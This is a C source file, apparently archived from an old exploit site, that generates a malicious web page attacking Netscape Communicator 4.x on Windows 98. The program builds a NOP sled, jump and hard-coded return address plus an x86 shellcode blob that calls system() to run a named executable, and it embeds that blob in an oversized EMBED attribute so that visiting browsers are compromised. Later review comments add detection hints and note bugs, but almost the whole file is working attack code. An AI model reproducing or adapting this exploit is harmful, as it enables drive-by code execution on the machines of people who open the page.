C/C++ Source or Header  |  2005-02-12  |  3KB  |  84 lines

  1. /************************************************************************/
  2. /*    Netscape communicator 4.06J - 4.6J, 4.61e Exploit for Windows98   */
  3. /*                                                */
  4. /*                    written by R00t Zer0(defcon0@ugtop.com)    */
  5. /*                                                */
  6. /*          DEF CON ZERO( http://www.ugtop.com/defcon0/index.htm)    */
  7. /************************************************************************/
  8.  
  9. #include <stdio.h>
  10. #include <stdlib.h>
  11. #include <string.h>
  12. #include <time.h>
  13. #include <sys/types.h>
  14. #include <sys/stat.h>
  15.  
  16. #define    STACK_LEN        ( 2135 )    /* size of exploit_code[] in main() */
  17. #define    EMBED_TYPE_LEN    ( 150 )    /* size of embed_type[], the random TYPE attribute value */
  18. #define    XPT_HDL_OFFSET    ( 588 )    /* index where main() stores JMP_EBX_ADDR; lower indices are pre-filled with NOP_CODE */
  19. #define    JMPS_OFFSET        ( 6 )    /* byte stored right after JMPS_CODE, i.e. the short-jump displacement */
  20. #define    JMP_EBX_ADDR    ( 0xbff7a06b )    /* hard-coded 32-bit address written at XPT_HDL_OFFSET; presumably tied to one Windows 98 build -- confirm */
  21. #define    INT01H_ADDR        ( 0xbff73d30 )    /* not referenced anywhere in this file */
  22. #define    NOP_CODE        ( 0x90 )    /* x86 NOP opcode, used as filler */
  23. #define    JMPS_CODE        ( 0xeb )    /* x86 short-jump (JMP rel8) opcode */
  24. #define    FUNCTION        "msvcrt.dll.system.exit."    /* text appended directly after win98_exec_code; looks like names the blob uses at run time -- not verifiable from this file */
  25. #define    COMMAND            "welcome.exe"    /* text appended last; its length is stored at win98_exec_code[ CMDLENP ] */
  26. #define    CMDLENP            ( 65 )    /* index in win98_exec_code that receives strlen( COMMAND ) */
  27.  
  28.  
  29. int
  30. main( void )
  31. {
        /*
         * CGI-style generator: writes an HTTP Content-type header and an HTML
         * page to stdout.  The page holds one <EMBED> tag whose PLUGINSPAGE
         * attribute carries the oversized binary string assembled below.  Per
         * the file header the affected clients are Netscape Communicator
         * 4.06J - 4.6J and 4.61e on Windows 98.  Takes no input and always
         * returns 0.
         *
         * Defender notes: the emitted tag is recognisable by a PLUGINSPAGE
         * value of several hundred bytes that begins with a long run of 0x90
         * and contains non-ASCII bytes, next to a random TYPE value of
         * EMBED_TYPE_LEN bytes.
         * NOTE(review): JMP_EBX_ADDR and the addresses inside win98_exec_code
         * are hard-coded, so the output presumably matches only one OS/DLL
         * build -- confirm against the original advisory.
         */

        /* Fixed machine-code blob, emitted verbatim.  The explicit 0x00 ends
         * the string for strcat() below; the unlisted remainder of the
         * 100-byte array is zero-initialised by the partial initializer. */
  32.   u_char win98_exec_code[100] = {
  33.     0xEB,0x4B,0x5B,0x53,0x32,0xE4,0x83,0xC3,0x0B,0x4B,0x88,0x23,0xB8,0x50,0x77,
  34.     0xF7,0xBF,0xFF,0xD0,0x8B,0xD0,0x52,0x43,0x53,0x52,0x32,0xE4,0x83,0xC3,0x06,
  35.     0x88,0x23,0xB8,0x28,0x6E,0xF7,0xBF,0xFF,0xD0,0x8B,0xF0,0x5A,0x43,0x53,0x52,
  36.     0x32,0xE4,0x83,0xC3,0x04,0x88,0x23,0xB8,0x28,0x6E,0xF7,0xBF,0xFF,0xD0,0x8B,
  37.     0xF8,0x43,0x53,0x83,0xC3,0x0B,0x32,0xE4,0x88,0x23,0xFF,0xD6,0x33,0xC0,0x50,
  38.     0xFF,0xD7,0xE8,0xB0,0xFF,0xFF,0xFF,0x00 };
  39.  
  40.   u_char    exploit_code[ STACK_LEN ];    /* PLUGINSPAGE value being assembled */
  41.   u_char    embed_type[ EMBED_TYPE_LEN ];    /* random TYPE value */
  42.   u_long    ip;    /* address to be stored byte by byte */
  43.   int        loop;
  44.  
  45.   srand( ( u_int )time( 0 ) );
  46.  
        /* Zero the whole buffer, then overwrite the first XPT_HDL_OFFSET bytes
         * with NOP_CODE.  The strcat() calls below rely on the first NUL byte
         * sitting directly after the 4 address bytes.
         * NOTE(review): bzero() is declared in <strings.h>, which this file
         * does not include. */
  47.   bzero( exploit_code, sizeof( exploit_code ) );
  48.   for( loop = 0; loop < XPT_HDL_OFFSET; loop++ )
  49.     exploit_code [loop ] = NOP_CODE;
  50.  
  51.   /* make exploit code: JMPS_CODE/JMPS_OFFSET go 4 and 3 bytes before
         * XPT_HDL_OFFSET, then JMP_EBX_ADDR is stored at XPT_HDL_OFFSET with
         * the least-significant byte first */
  52.   ip = JMP_EBX_ADDR;
  53.   exploit_code[ XPT_HDL_OFFSET - 4 ] = JMPS_CODE;
  54.   exploit_code[ XPT_HDL_OFFSET - 3 ] = JMPS_OFFSET;
  55.   exploit_code[ XPT_HDL_OFFSET + 3 ] = ( char)( 0xff & ( ip >> 24 ) );
  56.   exploit_code[ XPT_HDL_OFFSET + 2 ] = ( char)( 0xff & ( ip >> 16 ) );
  57.   exploit_code[ XPT_HDL_OFFSET + 1 ] = ( char)( 0xff & ( ip >> 8  ) );
  58.   exploit_code[ XPT_HDL_OFFSET + 0 ] = ( char)( 0xff & ( ip >> 0  ) );
  59.  
        /* Store the length of COMMAND inside the blob, then append blob,
         * FUNCTION and COMMAND as C strings.
         * NOTE(review): strcat() takes char pointers but is handed u_char
         * arrays here, and it treats the binary data as text: any zero byte
         * in the address or the blob would cut the string short. */
  60.   win98_exec_code[ CMDLENP ] = strlen( COMMAND );
  61.   strcat( exploit_code, win98_exec_code );
  62.   strcat( exploit_code, FUNCTION );
  63.   strcat( exploit_code, COMMAND );
  64.  
  65.  
  66.   /* set random type: every byte falls in 0x23..0x7f, so a double quote
         * (0x22) never appears inside the attribute value */
  67.   for( loop = 0; loop < EMBED_TYPE_LEN; loop++ )
  68.     embed_type[ loop ] = 0x23 + ( rand() % 93 );
        /* NOTE(review): all EMBED_TYPE_LEN bytes are filled and no NUL
         * terminator is stored, so the "%s" used for TYPE below is not bounded
         * by the array (undefined behaviour in this program itself). */
  69.  
  70.   /* print html: CGI header first, then the page on stdout */
  71.   printf( "Content-type: text/html\n\n" );
  72.   printf( "<HTML>\n" );
  73.   printf( "<HEAD>\n" );
  74.   printf( "    <TITLE>Netscape communicator 4.x Exploit!!</TITLE>\n" );
  75.   printf( "</HEAD>\n" );
  76.   printf( "<BODY>\n" );
  77.  
        /* The assembled buffer becomes the PLUGINSPAGE attribute and the
         * random bytes become TYPE; both are written raw, without escaping. */
  78.   printf( "<EMBED SRC=\"FreeUNYUN!\" PLUGINSPAGE=\"%s\" ", exploit_code );
  79.   printf( "TYPE=\"%s\" WIDTH=\"1500\" HEIGHT=\"1000\">\n", embed_type  );
  80.   printf( "</EMBED>\n</BODY>\n</HTML>\n" );
  81.  
  82.   return( 0 );
  83. }
  84. /*                    www.hack.co.za              [2000]*/